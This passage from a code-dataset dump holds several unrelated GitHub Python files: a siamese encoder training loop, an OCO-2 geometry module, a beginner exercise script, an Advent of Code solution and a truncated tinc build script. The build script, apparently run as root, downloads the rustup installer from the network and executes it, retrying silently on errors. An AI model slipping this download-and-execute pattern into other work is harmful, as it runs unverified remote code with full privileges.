min(int(np.floor(float(len(training_set)) / minibatch_size)), 2))\n\n            current_max_size = 4.\n            curriculum_step = .1\n\n            for i in range(max_iter):\n                sample_ordering = []\n                for j, tree in enumerate(training_set):\n                    if tree[-1] <= current_max_size:\n                        sample_ordering.append(j)\n                current_max_size += curriculum_step\n                np.random.shuffle(sample_ordering)  # shuffle the curriculum sample order in place\n                n_batches = 0\n\n                for j in trange(num_minibatches, desc=\"Minibatch\"):\n                    for k in trange(j * minibatch_size, min((j + 1) * minibatch_size, len(sample_ordering)),\n                                    desc=\"Sample\", leave=False):\n                        current_idx = sample_ordering[k]\n                        # Add siamese gradients, by picking num_examples\n                        num_examples = 1 # The max number of examples to pick from TODO: as parameter\n                        similar_snippet_idxs = []\n                        dissimilar_snippet_idxs = []\n                        for l in range(len(sample_ordering)):\n                            if l == k:\n                                continue\n                            other_idx = sample_ordering[l]\n                            if training_set[current_idx][2] == training_set[other_idx][2]:\n                                similar_snippet_idxs.append(other_idx)\n                            else:\n                                dissimilar_snippet_idxs.append(other_idx)\n                        dissimilar_snippet_idxs = 
np.array(dissimilar_snippet_idxs)\n\n np.random.shuffle(similar_snippet_idxs)\n for other_idx in similar_snippet_idxs:\n loss, repr1, repr2 = self.__compiled_methods.grad_siamese_similar(\n list(training_set[current_idx][0]), list(training_set[other_idx][0]))\n sum_similar_loss += loss\n num_similar_loss += 1\n\n for other_idx in dissimilar_snippet_idxs:\n loss, repr1, repr2 = self.__compiled_methods.grad_siamese_dissimilar(\n training_set[current_idx][0], training_set[other_idx][0])\n sum_dissimilar_loss += loss\n num_dissimilar_loss += 1 if loss < 0 else 0\n\n n_batches += 1\n ratios += self.__compiled_methods.grad_step()\n\n if i % validation_check_limit == validation_check_limit - 1:\n print(\"Iteration %s Stats\" % i)\n current_score = compute_validation_score()\n if current_score > best_score:\n best_score = current_score\n self.__trained_parameters = [p.get_value() for p in list(self.__encoder.parameters.values())]\n print(\"At %s validation: current_score=%s [best so far]\" % (i, current_score))\n epochs_not_improved = 0\n else:\n print(\"At %s validation: current_score=%s\" % (i, current_score))\n epochs_not_improved += 1\n for k in range(len(list(self.__encoder.parameters.values()))):\n print(\"%s: %.0e\" % (list(self.__encoder.parameters.values())[k].name, ratios[k] / n_batches))\n\n print(\"Train sum similar-loss: %s (%s samples)\" % (sum_similar_loss, num_similar_loss))\n print(\"Train sum dissimilar-loss: %s (%s samples)\" % (sum_dissimilar_loss, num_dissimilar_loss))\n print(\"Training Set stats: %s\" % compute_score(training_set[:500]))\n\n historic_values.append({\"validation_xent\": current_score})\n\n sum_similar_loss = 0\n num_similar_loss = 0\n sum_dissimilar_loss = 0\n num_dissimilar_loss = 0\n ratios = np.zeros_like(ratios)\n if additional_code_to_run is not None: additional_code_to_run()\n if epochs_not_improved >= patience:\n print(\"Not improved for %s epochs. Stopping...\" % patience)\n break\n print(\"[%s] Training Finished...\" % time.asctime())\n except (InterruptedError, KeyboardInterrupt):\n print(\"Interrupted. 
Exiting training gracefully...\")\n\n return best_score, historic_values\n\n def __save_current_params_as_best(self):\n self.__trained_parameters = [p.get_value() for p in list(self.__encoder.parameters.values())]\n\n def save(self, filename: str):\n tmp, self.__compiled_methods = self.__compiled_methods, None\n AbstractEncoder.save(self, filename)\n self.__compiled_methods = tmp\n\n def get_representation_vector_size(self) -> int:\n return self.__hyperparameters[\"representation_size\"]\n\n def get_encoding(self, data: tuple) -> np.array:\n self.__compile_if_needed()\n converted_tokens = self.dataset_extractor.tokens_to_array(data[0])\n return self.__compiled_methods.encode(converted_tokens)\n\n def decoder_loss(self, data: tuple, representation: np.array) -> float:\n raise NotImplementedError(\"An encoder cannot do this operation\")\n","repo_name":"mast-group/eqnet","sub_path":"encoders/token/grussiameseencoder.py","file_name":"grussiameseencoder.py","file_ext":"py","file_size_in_byte":18070,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"31"} +{"seq_id":"14436184348","text":"\"\"\" \r\nModule Geometry\r\n\r\nContains functions and classes for Geometry related\r\nproblems when working with OCO-2 sat data.\r\n\r\nMain useful definitions are:\r\n\r\nCoordGeom class for calculating distances in\r\nvarious bases from lat/lon coordinates\r\n\r\nSZA class for calculating model enhancements taking\r\ninto account zenith/azimuth angle corrections\r\n\"\"\"\r\n\r\nimport sys\r\nfrom math import sin, pi, acos, cos, atan2, tan\r\nimport math\r\n\r\nimport scipy\r\nimport scipy.integrate\r\nimport numpy\r\nfrom osgeo import ogr\r\n\r\nimport PlumeModel\r\n\r\n# Earth's radius in m\r\n_earth_radius = 6.371e6\r\n\r\n\r\ndef convex_hull(points):\r\n \"\"\"Computes the convex hull of a set of 2D points.\r\n \r\n Implements Andrew's monotone chain algorithm. O(n log n) complexity.\r\n\r\n Args: an iterable sequence of (x, y) pairs representing the points.\r\n \r\n Returns: a list of vertices of the convex hull in counter-clockwise order,\r\n starting from the vertex with the lexicographically smallest coordinates.\r\n \"\"\"\r\n\r\n # Sort the points lexicographically (tuples are compared lexicographically).\r\n # Remove duplicates to detect the case we have just one unique point.\r\n points = sorted(set(points))\r\n\r\n # Boring case: no points or a single point, possibly repeated multiple times.\r\n if len(points) <= 1:\r\n return points\r\n\r\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\r\n # Returns a positive value, if OAB makes a counter-clockwise turn,\r\n # negative for clockwise turn, and zero if the points are collinear.\r\n def cross(o, a, b):\r\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\r\n\r\n # Build lower hull \r\n lower = []\r\n for p in points:\r\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\r\n lower.pop()\r\n lower.append(p)\r\n\r\n # Build upper hull\r\n upper = []\r\n for p in reversed(points):\r\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\r\n upper.pop()\r\n upper.append(p)\r\n\r\n # Concatenation of the lower and upper hulls gives the convex hull.\r\n # Last point of each list is omitted because it is repeated at the beginning of the other list. 
\r\n return lower[:-1] + upper[:-1]\r\n\r\n \r\ndef dist(lat1,lon1,lat2,lon2):\r\n \"\"\"Computes the geodetic distance between two points.\r\n \r\n Function works naively, assuming Earth is a perfect sphere. Distance\r\n is calculated from the range between the two position vectors\r\n defined by (lat1, lon1) and (lat2, lon), and the radius of the Earth.\r\n \r\n Args:\r\n lat1, lon1, lat2, lon2: latitude and longitude of two points on\r\n Earth, measured in radians.\r\n \r\n Returns:\r\n Distance (float > 0) along the surface of the Earth (in meters)\r\n between points (lat1, lon1) and (lat2, lon2)\r\n \r\n Raises:\r\n ValueError if calculation fails\r\n \"\"\"\r\n dlat = lat2-lat1\r\n dlon = lon2-lon1\r\n if dlat==0 and dlon==0:\r\n return 0.\r\n try:\r\n angle = acos((sin(lat1)*sin(lat2))+(cos(lat1)*cos(lat2)*cos(lon2-lon1)))\r\n except ValueError:\r\n raise ValueError(\"Math domain error. Coordinates given were\\\r\n ({0},{1}), ({2},{3})\".format(lat1, lon1, lat2, lon2))\r\n r = _earth_radius*angle\r\n return r\r\n\r\n \r\nclass CoordGeom(object):\r\n \"\"\"Calculates distances between points in various bases.\r\n \r\n Uses dist function to compute absolute distance between two\r\n points, and uses either the lat/lon grid or the direction of\r\n the wind to define a basis to express this distance in.\r\n \r\n Attributes:\r\n wind: a PST.Wind instance defining the wind speed and direction;\r\n direction is used to define a wind basis (x\\hat, y\\hat)\r\n \"\"\"\r\n def __init__(self, wind):\r\n \"\"\"Initializes CoordGeom instance from a given Wind instance, wind.\"\"\"\r\n self.wind = wind\r\n \r\n def coord_to_dist(self, lat1d, lon1d, lat2d, lon2d):\r\n \"\"\"Converts lat/lon coordinate pairs to North/East distance coords.\r\n \r\n The distance between (lat1d, lon1d) and (lat2d, lon2d) along the\r\n surface of earth (assuming it is perfectly spherical) is calculated\r\n using the dist function, and is expressed as the pair (x, y); x is\r\n distance East, y is distance North.\r\n \r\n Args: 4 angles defining two lat/lon points, measured in degrees\r\n \r\n Returns: East, North distance coordinates (x, y)\r\n \"\"\"\r\n lat1=lat1d*pi/180.\r\n lat2=lat2d*pi/180.\r\n lon1=lon1d*pi/180.\r\n lon2=lon2d*pi/180.\r\n dlon = lon2 - lon1\r\n dlat = lat2-lat1\r\n r = abs(dist(lat1,lon1,lat2,lon2))\r\n x = dist(lat1,lon1,lat1,lon2)*numpy.sign(dlon)\r\n y = dist(lat1,lon1,lat2,lon1)*numpy.sign(dlat)\r\n return (x,y)\r\n \r\n def distance(self, lat1d, lon1d, lat2d, lon2d):\r\n \"\"\"Calculates the absolute distance between lat/lon pair.\r\n \r\n This is an alias for the dist function, but here the\r\n angles must be measured in degrees not radians\r\n \r\n Args:\r\n 4 angles defining two lat/lon points, measured in degrees\r\n \r\n Returns:\r\n Distance (float>0) between pair of points along Earth's surface\r\n \"\"\"\r\n lat1=lat1d*pi/180.\r\n lat2=lat2d*pi/180.\r\n lon1=lon1d*pi/180.\r\n lon2=lon2d*pi/180.\r\n dlon = lon2 - lon1\r\n dlat = lat2-lat1\r\n r = abs(dist(lat1,lon1,lat2,lon2))\r\n return r\r\n \r\n def to_wind_basis(self, x, y):\r\n \"\"\"Converts North/East coordinates to wind basis coordinates.\r\n \r\n The wind basis is defined as x\\hat in the direction along the wind,\r\n and y\\hat in the direction perpendicular to the wind.\r\n \r\n This basis was accidentally defined in a left handed way. That is,\r\n x\\hat (cross) y\\hat = -1. 
Be careful when selecting y distances in\r\n        subsequent functions/classes/methods.\r\n        \r\n        Args:\r\n            x, y: East, North coordinates\r\n        \r\n        Returns:\r\n            Tuple (xw, yw); the position (x, y) re-expressed in the basis along\r\n            and perpendicular to the wind direction\r\n        \"\"\"\r\n        theta = atan2(y,x) # angle of the vector (x, y) wrt positive x-axis\r\n        alpha = atan2(self.wind.v, self.wind.u) # angle of the wind vector wrt positive x-axis\r\n        beta = alpha-theta # angle between the wind vector and position vector\r\n        r = (x**2 + y**2)**0.5\r\n        x_new = (r*cos(beta))\r\n        y_new = (r*sin(beta))\r\n        return (x_new,y_new)\r\n    \r\n    def coord_to_wind_basis(self, lat1, lon1, lat2, lon2):\r\n        \"\"\"Converts lat/lon pair to a distance in the wind basis.\r\n        \r\n        Combines methods coord_to_dist and to_wind_basis to convert\r\n        directly from a lat/lon pair specified in degrees to a\r\n        coordinate pair in m along and perpendicular to the wind.\r\n        \r\n        Args:\r\n            4 angles defining two lat/lon points, measured in degrees\r\n        \r\n        Returns:\r\n            Tuple (x, y); distance along Earth's surface in the basis\r\n            defined by the wind. Be careful that this basis is accidentally\r\n            defined in a left-handed sense. Recommended to use KML maps\r\n            to identify whether you want to use positive or negative y\r\n        \"\"\"\r\n        x,y = self.coord_to_dist(lat1, lon1, lat2, lon2)\r\n        x_new, y_new = self.to_wind_basis(x, y)\r\n        return (x_new, y_new)\r\n    \r\n    def sza_offset(self, zenith, azimuth):\r\n        \"\"\"Calculates the relative offset caused by the zenith/azimuth angles.\r\n        \r\n        See the math document describing these offsets in much more detail.\r\n        When the solar zenith and azimuth angles are taken into account, the\r\n        model plume essentially must be shifted in the (x, y) direction by an\r\n        amount determined by the height, solar zenith angle, and solar\r\n        azimuth angle.\r\n        \r\n        Args:\r\n            zenith: zenith angle in degrees\r\n            azimuth: azimuth angle in degrees\r\n        \r\n        Returns:\r\n            Tuple (x, y); the x and y offsets necessary to correct the\r\n            model enhancements by based on the solar geometry\r\n        \"\"\"\r\n        azimuth *= pi/180.\r\n        zenith *= pi/180.\r\n        h = self.wind.height\r\n        r = h*tan(zenith)\r\n        x = r*sin(azimuth)\r\n        y = r*cos(azimuth)\r\n        return self.to_wind_basis(x,y)\r\n    \r\n    @staticmethod\r\n    def cartesian_distance(v1, v2):\r\n        \"\"\"Calculates the Euclidean norm of (v2-v1).\r\n        \r\n        This function is meant to be used for small distances (~ a few km)\r\n        since it assumes flat ground. It uses the standard formula for\r\n        distance between two points in a plane (L2-norm).\r\n        \r\n        Args:\r\n            2 tuples of (x, y) distance coordinates\r\n        \r\n        Returns:\r\n            float>0 distance between the two points assuming flat ground\"\"\"\r\n        x1, y1 = v1\r\n        x2, y2 = v2\r\n        return ((x2-x1)*(x2-x1) + (y2-y1)*(y2-y1))**0.5\r\n    \r\n    @staticmethod\r\n    def sgn(x):\r\n        \"\"\"Determines which half of the plane (x>0 or x<0) the angle x lies in.\r\n        \r\n        x is measured north-clockwise positive, the standard convention for\r\n        cardinal bearings. This function is useful for determining forward-\r\n        or back-scatter for solar/sensor zenith angle corrections.\r\n        \r\n        Args:\r\n            Angle x measured in degrees (0<=x<=360)\r\n        \r\n        Returns:\r\n            int -1 or +1; -1 means angle is in left half of plane (180 to 360\r\n            degrees), +1 means angle is in right half of plane (0 to 180 degrees)\r\n        \"\"\"\r\n        x = x % 360\r\n        return -1 if x > 180 else 1\r\n    \r\n    @staticmethod\r\n    def area(vertices):\r\n        \"\"\"Calculates the area on the ground enclosed by four (lon, lat) vertices.\r\n        \r\n        Args:\r\n            vertices: array of shape (4, 2) of (lon, lat) pairs in degrees\r\n        \r\n        Returns:\r\n            float>0, the area in m^2 enclosed by vertices, assuming\r\n            a flat plane.\r\n        \r\n        Raises:\r\n            ValueError if the vertices are not shape (4, 2)\r\n        \"\"\"\r\n        if not numpy.shape(vertices)==(4,2):\r\n            raise ValueError(\"vertices must be shape (4,2). 
Given\\n{0}\".format(vertices))\r\n \r\n latitudes = vertices[:,1]\r\n longitudes = vertices[:,0]\r\n \r\n def reproject(latitude, longitude):\r\n \"\"\"Returns the x & y coordinates in meters using a sinusoidal projection\"\"\"\r\n from math import pi, cos, radians\r\n lat_dist = pi * _earth_radius / 180.0\r\n\r\n y = [lat * lat_dist for lat in latitude]\r\n x = [long * lat_dist * cos(radians(lat)) \r\n for lat, long in zip(latitude, longitude)]\r\n return x, y\r\n \r\n ring = ogr.Geometry(ogr.wkbLinearRing)\r\n \r\n x_r, y_r = reproject(latitudes,longitudes)\r\n for (x,y) in zip(x_r,y_r):\r\n ring.AddPoint(x,y)\r\n ring.AddPoint(x_r[0],y_r[0]) # close the ring\r\n \r\n poly = ogr.Geometry(ogr.wkbPolygon)\r\n poly.AddGeometry(ring)\r\n area = poly.GetArea()\r\n \r\n return area\r\n\r\n \r\n \r\n\r\ndef cosdeg(x):\r\n \"\"\"Converts x to radians from degrees and returns cos(x_radians)\"\"\"\r\n angle = x * pi/180.\r\n return cos(angle)\r\n \r\n \r\n\r\nclass SZA(object):\r\n \"\"\"Controls zenith and azimuth angle adjustments.\r\n \r\n Recommended to look at the diagrams, equations in the math\r\n documentation before reading this class.\r\n \r\n Finds the model enhancements at the \"incoming\" and \"reflected\"\r\n points in the plume, and averages the model enhancements at\r\n these two points.\r\n \r\n Attributes:\r\n data: The object containing OCO-2 data\r\n wind: Wind instance to use as direction basis\r\n coord: CoordGeom instance used to compute distance offsets\r\n \"\"\"\r\n def __init__(self,data,wind):\r\n \"\"\"Initializes SZA instance.\r\n \r\n Args:\r\n data, a File.File instance to get datasets from\r\n wind, a PST.Wind instance to create a CoordGeom instance\r\n for computing distances, etc.\r\n \"\"\"\r\n self.data = data\r\n self.wind = wind\r\n coord = CoordGeom(wind)\r\n self.coord = coord\r\n \r\n def offsets(self,i):\r\n \"\"\"Calculates the (x,y) offsets for incoming and reflected ray.\r\n \r\n The (x, y) offsets must be used to shift the model enhancemnts to\r\n account for the discrepancy between the footprint on the ground,\r\n and where the rays actually pass through the plume.\r\n \r\n Args:\r\n i, the index in the data to calcualte the offset for\r\n \r\n Returns:\r\n List of tuples [(xi, yi), (xr, yr)] for incoming and reflected\r\n ray offsets. Offsets themselves are calculated using\r\n CoordGeom.sza_offset method\r\n \"\"\"\r\n data = self.data\r\n incoming_coords = self.coord.sza_offset(data.retrieval_solar_zenith[i], data.retrieval_solar_azimuth[i])\r\n reflected_coords= self.coord.sza_offset(data.retrieval_zenith[i], data.retrieval_solar_azimuth[i])\r\n return (incoming_coords, (-reflected_coords[0], -reflected_coords[1]))\r\n \r\n def V(self,x,y,u,F,a,i,correction=False):\r\n \"\"\"Computes the model enhancements including SZA offsets.\r\n \r\n Incoming and reflected offsets are calculated with offsets\r\n method. 
These offsets are applied to the position (x, y), and\r\n then enhancements are calculated using PlumeModel.V function.\r\n \r\n Args:\r\n Args passed to PlumeModel.V (x, y, u, F, a)\r\n i; index in file to use for zenith and azimuth angles\r\n correction; A Bool controlling whether to account for\r\n the angle the ray passes through the plume in.\r\n No longer implemented, since we are using a\r\n 2D plume model and this opens up too many\r\n other uncertainties.\r\n \r\n Returns:\r\n Enhancements in g/m^2 that are expected at ground footprint (x,y)\r\n \"\"\"\r\n (x_incoming, y_incoming), (x_reflected, y_reflected) = self.offsets(i)\r\n V_incoming = PlumeModel.V(x+x_incoming, y+y_incoming, u,F,a)\r\n V_reflected = PlumeModel.V(x+x_reflected, y+y_reflected, u,F,a)\r\n V_corrected = 0.5*(V_incoming + V_reflected)\r\n \r\n return V_corrected\r\n \r\n def __repr__(self):\r\n return \"SZA({0},{1}\".format(self.data, self.wind.__repr__())\r\n \r\n def __str__(self):\r\n return \"SZA({0})\".format(self.data)\r\n \r\n \r\n## Following class is able to calcualte model enhancements by\r\n## integrating along paths from the ground to the 3D point (x,y,z)\r\n## to calculate more accurately the expected enhancements. This was\r\n## tested and would work properly if we used a full 3D Gaussian plume\r\n## model. This was never actually implemented in the production Model.\r\n# class Line:\r\n # \"\"\"class for parameterizing a line between two (x, y, z) coordinates.\r\n # Uses the position (x_source, y_source, 0) as the source, and calculates\r\n # the parameterization of the line.\r\n \r\n # Conveniently, you can iterate over a Line instance and it will yield\r\n # (x, y, z) for each point on the line.\r\n \r\n # Calculates the path integral along the line for a specified scalar field,\r\n # or along a vertical path with x, y fixed.\r\n \r\n # This lets you calculate the additional factor due to increased path length\r\n # through the CO2 plume\r\n \r\n # The first point must be the ground footprint point, unless you specify\r\n # explicitly in the vertical_line_integral method\"\"\"\r\n \r\n # def __init__(self,p1=None, p2=None):\r\n # self.points = []\r\n # if p1:\r\n # self.points.append(p1)\r\n \r\n # if p2:\r\n # self.points.append(p2)\r\n \r\n # def add_point(self, pnt):\r\n # if len(self.points)==2:\r\n # err_msg = \"This line is already associated with points {0}, {1};\\\r\n # can not add point {2}\".format(self.points[0],self.points[1],pnt)\r\n # raise ValueError(err_msg)\r\n # self.points.append(pnt)\r\n \r\n # def remove_point(self,index=-1):\r\n # self.points.pop(index)\r\n \r\n # def discrete(self,npoints=101):\r\n # \"\"\"Returns a list of [x_points, y_points, z_points] where each is an\r\n # array of points in that dimension on the line\"\"\"\r\n # if len(self.points)!=2:\r\n # raise ValueError(\"Line must have two points to parameterize\")\r\n \r\n # try:\r\n # (x1, y1, z1), (x2, y2, z2) = self.points\r\n # except:\r\n # raise\r\n # else:\r\n # x_pts = numpy.linspace(x1,x2,npoints)\r\n # y_pts = numpy.linspace(y1,y2,npoints)\r\n # z_pts = numpy.linspace(z1,z2,npoints)\r\n # return [x_pts, y_pts, z_pts]\r\n \r\n # def __iter__(self,npoints=101):\r\n # \"\"\"Allows iteration over discrete points on the line.\r\n \r\n # Yields:\r\n # (x, y, z) for each point on the line, calculated at\r\n # npoints number of discrete points\"\"\"\r\n # x_pts, y_pts, z_pts = self.discrete(npoints)\r\n # for (x,y,z) in zip(x_pts, y_pts, z_pts):\r\n # yield (x,y,z)\r\n \r\n # def __repr__(self):\r\n # pts = 
', '.join([str(p) for p in self.points])\r\n        # return \"Line({0})\".format(pts)\r\n    \r\n    # def parameterize(self):\r\n        # \"\"\"Function representing the parameterization of the line.\r\n        \r\n        # Returns:\r\n            # A function object \r\n                # L(t) = (a*t + x0, b*t + y0, c*t + z0)\r\n        \r\n        # Function returns the vector (x(t), y(t), z(t))\"\"\"\r\n        # (x1, y1, z1), (x2, y2, z2) = self.points\r\n        # a, b, c = self.coefficients()\r\n        # def line(t):\r\n            # return (a*t+x1, b*t+y1, c*t+z1)\r\n        # return line\r\n    \r\n    \r\n    # def coefficients(self):\r\n        # \"\"\"Calculates the coefficients (really this is the derivative) of\r\n        # the line.\r\n        \r\n        # Returns:\r\n            # Let the line be parameterized by\r\n                # L = (a*t + x0, b*t + y0, c*t + z0)\r\n            # self.coefficients() returns (a, b, c)\"\"\"\r\n        # (x1, y1, z1), (x2, y2, z2) = self.points\r\n        # vector = (x2-x1, y2-y1, z2-z1)\r\n        # norm = numpy.linalg.norm(vector)\r\n        # return numpy.array(vector)/norm\r\n    \r\n    \r\n    # def integrate(self, function, t_lower=-numpy.inf, t_upper=numpy.inf):\r\n        # \"\"\"Calls scipy.integrate after setting up a path integral.\r\n        \r\n        # Args:\r\n            # function is a scalar field F(x,y,z)\r\n        \r\n        # Returns:\r\n            # scalar path integral along path described by self, through scalar\r\n            # field F, from t_lower to t_upper\r\n        # \"\"\"\r\n        # a,b,c = self.coefficients()\r\n        # (x1,y1,z1) = self.points[0]\r\n        # dt = (a*a + b*b + c*c)**0.5\r\n        \r\n        # def integrand(t):\r\n            # return function(a*t+x1, b*t+y1, c*t+z1)*dt\r\n        \r\n        # return scipy.integrate.quad(integrand, t_lower, t_upper)[0]\r\n    \r\n    # def vertical_line_integral(self, function, point=0, \r\n                            # t_lower=-numpy.inf, t_upper=numpy.inf):\r\n        # \"\"\"Calls scipy.integrate after setting up a path integral.\r\n        # Integrates vertically from point at index point\r\n        \r\n        # Args:\r\n            # function is a scalar field F(x,y,z)\r\n        \r\n        # Returns:\r\n            # scalar path integral along path described by self, through scalar\r\n            # field F, from t_lower to t_upper\r\n        # \"\"\"\r\n        \r\n        # (x1,y1,z1) = self.points[point]\r\n        \r\n        # def vertical_function(t):\r\n            # \"\"\" No dt since the norm of the derivative is 1, as we\r\n            # defined the coefficient of z to be 1\"\"\"\r\n            # return function(x1,y1,t+z1)\r\n\r\n        # vertical_path = scipy.integrate.quad(vertical_function, t_lower, t_upper)[0]\r\n        # return vertical_path\r\n    \r\n    # def airmass_factor(self,function):\r\n        # return float(self.integrate(function))/float(self.vertical_line_integral(function))\r\n","repo_name":"tghill-private/ideal-octopy","sub_path":"python/PointSources/Geometry.py","file_name":"Geometry.py","file_ext":"py","file_size_in_byte":21065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
{"seq_id":"29871756652","text":"#Daniil Meijel\r\n#11.10.22\r\n#Exercise02\r\nimport math\r\n\r\n\r\n\r\nkm = 400\r\nl = 26\r\nv = l/(km*100)\r\nprint(v)\r\n\r\n\r\n\r\n\r\n#number systems\r\nb = int(input(\"enter an integer: \"))\r\nprint(\"in base 2:\", bin(b))\r\nprint(\"in base 16:\", hex(b))\r\n\r\n\r\n\r\n#time conversion\r\naeg = int(input(\"Enter minutes: \"))\r\ntunnid = aeg // 60 #integer division\r\nminutid = aeg % 60 #remainder\r\nprint(\"Answer:\",tunnid,\":\",minutid)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#hypotenuse\r\na,b = 16,9\r\nc = round(math.sqrt(pow(a,2) + b**2),2)\r\nprint(\"The hypotenuse of the triangle is:\",c)\r\n\r\n\r\n\r\n\r\n#roller skaters\r\nkiirus = 29.9\r\naeg = 24\r\nkaugus = round(kiirus/60*aeg,2)\r\nprint(\"The athlete covers\",kaugus,\"km\")\r\n\r\n\r\n\r\n\r\n\r\n#pizza\r\nhind = 12.9\r\ntip = 0.1\r\nkogus = 
3\r\nsumma = (hind+hind*tip)/kogus\r\nprint(kogus,\"Each person pays\",summa,\"euros\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#product price\r\nhind = 36.75\r\nale = 0.4\r\nkogus = 3\r\nsumma = round((hind-hind*ale)*kogus,2)\r\nprint(kogus,\"items cost a total of\",summa,\"euros\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#triangle perimeter\r\na,b,c = 5,5,5\r\np = a + b + c\r\nprint(\"The perimeter of the triangle is: \", p)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"AeroDynamicc/Pythonn","sub_path":"h02d.py","file_name":"h02d.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"31691170432","text":"from collections import Counter\n\n\ndef simulate(f, iterations):\n    forest = []\n    seen = {}\n    period = []\n    printed = False\n\n    for line in f.readlines():\n        forest.append(line.strip())\n\n    for i in range(0, iterations):\n        if i % 100 == 0:\n            print(i)\n\n        new = []\n\n        for y, row in enumerate(forest):\n            line = ''\n\n            for x, c in enumerate(row):\n                counts = count_close(forest, y, x)\n\n                if c == '.':\n                    if counts['trees'] > 2:\n                        line += '|'\n                    else:\n                        line += '.'\n\n                if c == '|':\n                    if counts['lumberyards'] > 2:\n                        line += '#'\n                    else:\n                        line += '|'\n\n                if c == '#':\n                    if counts['lumberyards'] and counts['trees']:\n                        line += '#'\n                    else:\n                        line += '.'\n\n            new.append(line)\n\n        checksum = '-'.join(new)\n\n        if checksum in seen and not printed:\n            printed = True\n            state = (iterations - seen[checksum]) % (i - seen[checksum])\n            idx = seen[checksum] + state\n\n            # 208750 -- too high\n            # 194959 -- too low\n            print(state)\n            print('period', i, 'from', seen[checksum])\n            print('idx', idx)\n            c = Counter(period[idx - 1])\n            return c['#'] * c['|']\n\n        seen[checksum] = i\n        period.append(checksum)\n        forest = new\n\n    c = Counter()\n\n    for row in forest:\n        c.update(row)\n\n    return c['#'] * c['|']\n\n\ndef count_close(forest, y, x):\n    counts = {\n        'trees': 0,\n        'lumberyards': 0,\n    }\n\n    if y > 0 and x > 0:\n        add_count(counts, forest[y-1][x-1])\n\n    if y > 0:\n        add_count(counts, forest[y-1][x])\n\n    if x > 0:\n        add_count(counts, forest[y][x-1])\n\n    if y < (len(forest) - 1):\n        add_count(counts, forest[y + 1][x])\n\n    if x < (len(forest[y]) - 1):\n        add_count(counts, forest[y][x + 1])\n\n    if y < (len(forest) - 1) and x < (len(forest[y]) - 1):\n        add_count(counts, forest[y + 1][x + 1])\n\n    if y < (len(forest) - 1) and x > 0:\n        add_count(counts, forest[y + 1][x - 1])\n\n    if x < (len(forest[y]) - 1) and y > 0:\n        add_count(counts, forest[y - 1][x + 1])\n\n    return counts\n\n\ndef add_count(counts, letter):\n    if letter == '|':\n        counts['trees'] += 1\n    elif letter == '#':\n        counts['lumberyards'] += 1\n\n\ndef test_simulate():\n    assert simulate(open('input/18.test'), iterations=10) == 1147\n\n\nif __name__ == '__main__':\n    print(simulate(open('input/18'), iterations=1_000_000_000))","repo_name":"matslindh/codingchallenges","sub_path":"adventofcode2018/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"}
{"seq_id":"73844127128","text":"#!/usr/bin/python3\nimport os\nimport sys\n\ntinc_lib_dir = \"/root/tinc/lib\"\ntry:\n    os.system(\"mkdir -p \" + tinc_lib_dir)\nexcept:\n    pass\n\nif len(sys.argv) > 1 and sys.argv[1] == \"init\":\n    os.system(\"cp /usr/lib/x86_64-linux-gnu/liblzo2.so \" + tinc_lib_dir + \"/liblzo2.so.2\")\n    os.system(\"cp /lib/x86_64-linux-gnu/libncurses.so.5.9 \" + tinc_lib_dir + \"/libncurses.so.5\")\n\n    
openssl_dir = \"/root/openssl\"\n\n print(\"download openssl\")\n\n os.system(\"wget https://github.com/openssl/openssl/archive/OpenSSL_1_1_1.tar.gz\")\n os.system(\"tar zxvf OpenSSL_1_1_1.tar.gz\")\n os.system(\"mv openssl-OpenSSL_1_1_1 \" + openssl_dir)\n print(\"download openssl finish.\")\n\n os.chdir(openssl_dir)\n os.system(\"chmod 777 config\")\n os.system(\"./config shared\")\n os.system(\"make install\")\n os.system(\"cp /root/openssl/libcrypto.so.1.1 \" + tinc_lib_dir + \"/libcrypto.so.1.1\")\n\n readline_dir = \"/root/readline-8.0\"\n os.chdir(\"/root\")\n os.system(\"wget http://ftp.gnu.org/gnu/readline/readline-8.0.tar.gz\")\n os.system(\"tar -zxvf readline-8.0.tar.gz\")\n os.chdir(readline_dir)\n os.system(\"chmod 777 configure\")\n os.system(\"./configure --enable-shared\")\n os.system(\"make\")\n os.system(\"sudo make install\")\n os.system(\"cp /usr/lib/x86_64-linux-gnu/libreadline.so \" + tinc_lib_dir + \"/libreadline.so.8\")\n\n cargo_dir = \"/root/.cargo\"\n os.chdir(\"/root\")\n while True:\n try:\n os.system(\"wget -O rustup.sh https://sh.rustup.rs\")\n os.system(\"chmod 0755 rustup.sh\")\n os.system(\"./rustup.sh -y\")\n break\n except:\n pass\n\nif len(sys.argv) > 1 and (sys.argv[1] == \"tinc\" or sys.argv[1] == \"init\"):\n tinc_dir = \"/root/tinc_src\"\n if not os.path.exists(tinc_dir):\n os.chdir(\"/root\")\n os.system(\"git clone -b release-1.1pre17 https://github.com/gsliepen/tinc.git \"\n + tinc_dir)\n os.chdir(tinc_dir)\n else:\n os.chdir(tinc_dir)\n\n os.chdir(tinc_dir)\n os.system(\"autoreconf -fsi\")\n os.system(\"chmod 777 configure\")\n os.system(\"./configure\"\n \" --with-readline-lib=/root/readline-8.0/shlib/\"\n \" --with-readline-include=/root/readline-8.0/include\")\n os.system(\"sed -i 's#FLAGS = -g -O2 -Wall#FLAGS = -g -O2 -Wall -Wl,-rpath=/opt/dnet/tinc/lib#g' \"\n + tinc_dir + \"/src/Makefile\")\n os.system(\"make\")\n if os.system(\"cp \" + tinc_dir + \"/src/tinc /root/tinc/tinc\"):\n print(\"compile tinc failed.\")\n exit(1)\n if os.system(\"cp \" + tinc_dir + \"/src/tincd 